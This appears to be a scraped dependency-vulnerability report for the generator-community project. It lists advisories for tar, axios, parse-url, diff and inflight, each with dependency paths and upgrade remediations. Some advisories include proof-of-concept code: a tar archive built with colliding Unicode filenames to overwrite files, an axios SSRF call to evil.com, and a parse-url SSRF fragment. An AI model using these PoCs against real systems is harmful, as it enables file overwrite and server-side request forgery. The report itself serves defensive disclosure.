if(parsed.resource=="localhost"){
console.log("internal network access is blocked")
}
else{
   const response = await fetch('http://'+parsed.resource+parsed.pathname);
        console.log(response)
 }

Remediation

Upgrade parse-url to version 8.1.0 or higher.

References

medium severity

Improper Handling of Unicode Encoding

  • Vulnerable module: tar
  • Introduced through: generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 npm-registry-fetch@14.0.5 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 @npmcli/run-script@6.0.2 node-gyp@9.4.1 make-fetch-happen@10.2.1 cacache@16.1.3 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/sign@1.0.0 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 pacote@15.2.0 sigstore@1.9.0 @sigstore/tuf@1.0.3 tuf-js@1.1.7 make-fetch-happen@11.1.1 cacache@17.1.4 tar@6.2.1

Overview

tar is a full-featured Tar for Node.js.

Affected versions of this package are vulnerable to Improper Handling of Unicode Encoding in Path Reservations via Unicode Sharp-S (ß) Collisions on macOS APFS. An attacker can overwrite arbitrary files by exploiting Unicode normalization collisions in filenames within a malicious tar archive on case-insensitive or normalization-insensitive filesystems.

Note:

This is only exploitable if the system is running on a filesystem such as macOS APFS or HFS+ that ignores Unicode normalization.

Workaround

This vulnerability can be mitigated by filtering out all SymbolicLink entries when extracting tarball data.

PoC

const tar = require('tar');
const fs = require('fs');
const path = require('path');
const { PassThrough } = require('stream');

const exploitDir = path.resolve('race_exploit_dir');
if (fs.existsSync(exploitDir)) fs.rmSync(exploitDir, { recursive: true, force: true });
fs.mkdirSync(exploitDir);

console.log('[*] Testing...');
console.log(`[*] Extraction target: ${exploitDir}`);

// Construct stream
const stream = new PassThrough();

const contentA = 'A'.repeat(1000);
const contentB = 'B'.repeat(1000);

// Key 1: "f_ss"
const header1 = new tar.Header({
    path: 'collision_ss',
    mode: 0o644,
    size: contentA.length,
});
header1.encode();

// Key 2: "f_ß"
const header2 = new tar.Header({
    path: 'collision_ß',
    mode: 0o644,
    size: contentB.length,
});
header2.encode();

// Write to stream
stream.write(header1.block);
stream.write(contentA);
stream.write(Buffer.alloc(512 - (contentA.length % 512))); // Padding

stream.write(header2.block);
stream.write(contentB);
stream.write(Buffer.alloc(512 - (contentB.length % 512))); // Padding

// End
stream.write(Buffer.alloc(1024));
stream.end();

// Extract
const extract = new tar.Unpack({
    cwd: exploitDir,
    // Ensure jobs is high enough to allow parallel processing if locks fail
    jobs: 8 
});

stream.pipe(extract);

extract.on('end', () => {
    console.log('[*] Extraction complete');

    // Check what exists
    const files = fs.readdirSync(exploitDir);
    console.log('[*] Files in exploit dir:', files);
    files.forEach(f => {
        const p = path.join(exploitDir, f);
        const stat = fs.statSync(p);
        const content = fs.readFileSync(p, 'utf8');
        console.log(`File: ${f}, Inode: ${stat.ino}, Content: ${content.substring(0, 10)}... (Length: ${content.length})`);
    });

    if (files.length === 1 || (files.length === 2 && fs.statSync(path.join(exploitDir, files[0])).ino === fs.statSync(path.join(exploitDir, files[1])).ino)) {
        console.log('\[*] GOOD');
    } else {
        console.log('[-] No collision');
    }
});

Remediation

Upgrade tar to version 7.5.4 or higher.

References

medium severity

Improper Encoding or Escaping of Output

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Improper Encoding or Escaping of Output through the encode function in AxiosURLSearchParams. An attacker can smuggle a NUL byte into serialized query strings by supplying crafted parameter values, causing downstream parsers or backend components to misinterpret the request and potentially truncate or alter parameter handling.

Notes: Standard axios request flow (buildURL) uses its own encode function, which does NOT have this bug. Only triggered via direct AxiosURLSearchParams.toString() without an encoder, or via custom paramsSerializer delegation

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

medium severity

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via the mergeDirectKeys function in mergeConfig. An attacker can force a request configuration to inherit attacker-controlled properties by supplying a polluted Object.prototype, causing Axios to read inherited values, such as validateStatus, during config merging. This lets a malicious page or library alter how responses are handled, including making 4xx and 5xx responses be treated as successful and bypassing normal error handling in applications that rely on Axios defaults.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.31.1, 1.15.1 or higher.

References

medium severity
new

Prototype Pollution

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Prototype Pollution via polluted Object.prototype properties in the merge process. An attacker can inject arbitrary HTTP headers into outbound requests or cause synchronous application crashes by manipulating upstream dependencies to pollute prototype attributes, leading to header injection or denial of service conditions.

Details

Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.

There are two main ways in which the pollution of prototypes occurs:

  • Unsafe Object recursive merge

  • Property definition by path

Unsafe Object recursive merge

The logic of a vulnerable recursive merge function follows the following high-level model:

merge (target, source)

  foreach property of source

    if property exists and is an object on both the target and the source

      merge(target[property], source[property])

    else

      target[property] = source[property]

When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.

Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).

lodash and Hoek are examples of libraries susceptible to recursive merge attacks.

Property definition by path

There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)

If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.

Types of attacks

There are a few methods by which Prototype Pollution can be manipulated:

Type Origin Short description
Denial of service (DoS) Client This is the most likely attack.
DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf).
The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service.
For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail.
Remote Code Execution Client Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation.
For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code.
Property Injection Client The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens.
For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges.

Affected environments

The following environments are susceptible to a Prototype Pollution attack:

  • Application server

  • Web server

  • Web browser

How to prevent

  1. Freeze the prototype— use Object.freeze (Object.prototype).

  2. Require schema validation of JSON input.

  3. Avoid using unsafe recursive merge functions.

  4. Consider using objects without prototypes (for example, Object.create(null)), breaking the prototype chain and preventing pollution.

  5. As a best practice use Map instead of Object.

For more information on this vulnerability type:

Arteau, Olivier. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018

Remediation

Upgrade axios to version 0.32.0, 1.16.0 or higher.

References

medium severity

Unintended Proxy or Intermediary ('Confused Deputy')

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Unintended Proxy or Intermediary ('Confused Deputy') via improper hostname normalization in the NO_PROXY environment variable. An attacker controlling request URLs can access internal or loopback services by crafting requests (with a trailing dot or [::1]) that bypass proxy restrictions, causing sensitive requests to be routed through an unintended proxy.

Note:

This is only exploitable if the application relies on NO_PROXY=localhost,127.0.0.1,::1 for protecting loopback/internal access.

Remediation

Upgrade axios to version 0.31.0, 1.15.0 or higher.

References

medium severity

Regular Expression Denial of Service (ReDoS)

  • Vulnerable module: diff
  • Introduced through: generator-license@5.1.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 diff@2.2.3
    Remediation: Upgrade to generator-license@5.2.0.
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 diff@2.2.3
    Remediation: Upgrade to generator-node@2.4.0.

Overview

diff is a javascript text differencing implementation.

Affected versions of this package are vulnerable to Regular Expression Denial of Service (ReDoS) via the parsePatch() and applyPatch() functions if the user input passed without sanitisation. An attacker can cause the process to enter an infinite loop and exhaust system memory by providing a patch with filename headers containing \r, \u2028, or \u2029 characters or having control over patch's patch header for application generated patches.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its original and legitimate users. There are many types of DoS attacks, ranging from trying to clog the network pipes to the system by generating a large volume of traffic from many machines (a Distributed Denial of Service - DDoS - attack) to sending crafted requests that cause a system to crash or take a disproportional amount of time to process.

The Regular expression Denial of Service (ReDoS) is a type of Denial of Service attack. Regular expressions are incredibly powerful, but they aren't very intuitive and can ultimately end up making it easy for attackers to take your site down.

Let’s take the following regular expression as an example:

regex = /A(B|C+)+D/

This regular expression accomplishes the following:

  • A The string must start with the letter 'A'
  • (B|C+)+ The string must then follow the letter A with either the letter 'B' or some number of occurrences of the letter 'C' (the + matches one or more times). The + at the end of this section states that we can look for one or more matches of this section.
  • D Finally, we ensure this section of the string ends with a 'D'

The expression would match inputs such as ABBD, ABCCCCD, ABCBCCCD and ACCCCCD

It most cases, it doesn't take very long for a regex engine to find a match:

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCD")'
0.04s user 0.01s system 95% cpu 0.052 total

$ time node -e '/A(B|C+)+D/.test("ACCCCCCCCCCCCCCCCCCCCCCCCCCCCX")'
1.79s user 0.02s system 99% cpu 1.812 total

The entire process of testing it against a 30 characters long string takes around ~52ms. But when given an invalid string, it takes nearly two seconds to complete the test, over ten times as long as it took to test a valid string. The dramatic difference is due to the way regular expressions get evaluated.

Most Regex engines will work very similarly (with minor differences). The engine will match the first possible way to accept the current character and proceed to the next one. If it then fails to match the next one, it will backtrack and see if there was another way to digest the previous character. If it goes too far down the rabbit hole only to find out the string doesn’t match in the end, and if many characters have multiple valid regex paths, the number of backtracking steps can become very large, resulting in what is known as catastrophic backtracking.

Let's look at how our expression runs into this problem, using a shorter string: "ACCCX". While it seems fairly straightforward, there are still four different ways that the engine could match those three C's:

  1. CCC
  2. CC+C
  3. C+CC
  4. C+C+C.

The engine has to try each of those combinations to see if any of them potentially match against the expression. When you combine that with the other steps the engine must take, we can use RegEx 101 debugger to see the engine has to take a total of 38 steps before it can determine the string doesn't match.

From there, the number of steps the engine must use to validate a string just continues to grow.

String Number of C's Number of steps
ACCCX 3 38
ACCCCX 4 71
ACCCCCX 5 136
ACCCCCCCCCCCCCCX 14 65,553

By the time the string includes 14 C's, the engine has to take over 65,000 steps just to see if the string is valid. These extreme situations can cause them to work very slowly (exponentially related to input size, as shown above), allowing an attacker to exploit this and can cause the service to excessively consume CPU, resulting in a Denial of Service.

Remediation

Upgrade diff to version 3.5.1, 4.0.4, 5.2.2, 8.0.3 or higher.

References

medium severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to the allowAbsoluteUrls attribute being ignored in the call to the buildFullPath function from the HTTP adapter. An attacker could launch SSRF attacks or exfiltrate sensitive data by tricking applications into sending requests to malicious endpoints.

PoC

const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');

Remediation

Upgrade axios to version 0.30.0, 1.8.2 or higher.

References

medium severity

Server-side Request Forgery (SSRF)

  • Vulnerable module: axios
  • Introduced through: yeoman-generator@2.0.0 and generator-node@2.2.0

Detailed paths

  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 yeoman-environment@2.10.3 yeoman-generator@4.13.0 yeoman-environment@2.10.3 npm-api@1.0.1 paged-request@2.0.2 axios@0.21.4

Overview

axios is a promise-based HTTP client for the browser and Node.js.

Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to not setting allowAbsoluteUrls to false by default when processing a requested URL in buildFullPath(). It may not be obvious that this value is being used with the less safe default, and URLs that are expected to be blocked may be accepted. This is a bypass of the fix for the vulnerability described in CVE-2025-27152.

Remediation

Upgrade axios to version 0.30.0, 1.8.3 or higher.

References

medium severity

Missing Release of Resource after Effective Lifetime

  • Vulnerable module: inflight
  • Introduced through: markdown-magic@0.1.18, yeoman-generator@2.0.0 and others

Detailed paths

  • Introduced through: generator-community@commonality/generator-community markdown-magic@0.1.18 globby@6.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 mem-fs-editor@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 shelljs@0.7.8 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 mem-fs-editor@3.0.2 globby@6.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 mem-fs-editor@3.0.2 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 shelljs@0.7.8 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 shelljs@0.7.8 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 globby@8.0.2 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 globby@6.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 globby@6.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 mem-fs-editor@3.0.2 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 mem-fs-editor@6.0.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 shelljs@0.8.5 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 shelljs@0.8.5 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-license@5.7.1 yeoman-generator@5.10.0 shelljs@0.8.5 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 shelljs@0.8.5 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 mem-fs-editor@4.0.3 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-license@5.1.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 globby@4.1.0 glob@6.0.4 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 yeoman-generator@1.1.1 yeoman-environment@1.6.6 globby@4.1.0 glob@6.0.4 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-travis@1.10.0 yeoman-generator@2.0.5 mem-fs-editor@4.0.3 rimraf@2.7.1 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community yeoman-generator@2.0.0 yeoman-environment@2.10.3 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 globby@9.2.0 glob@7.2.3 inflight@1.0.6
  • Introduced through: generator-community@commonality/generator-community generator-node@2.2.0 generator-jest@1.8.0 yeoman-generator@4.13.0 mem-fs-editor@7.1.0 rimraf@3.0.2 glob@7.2.3 inflight@1.0.6
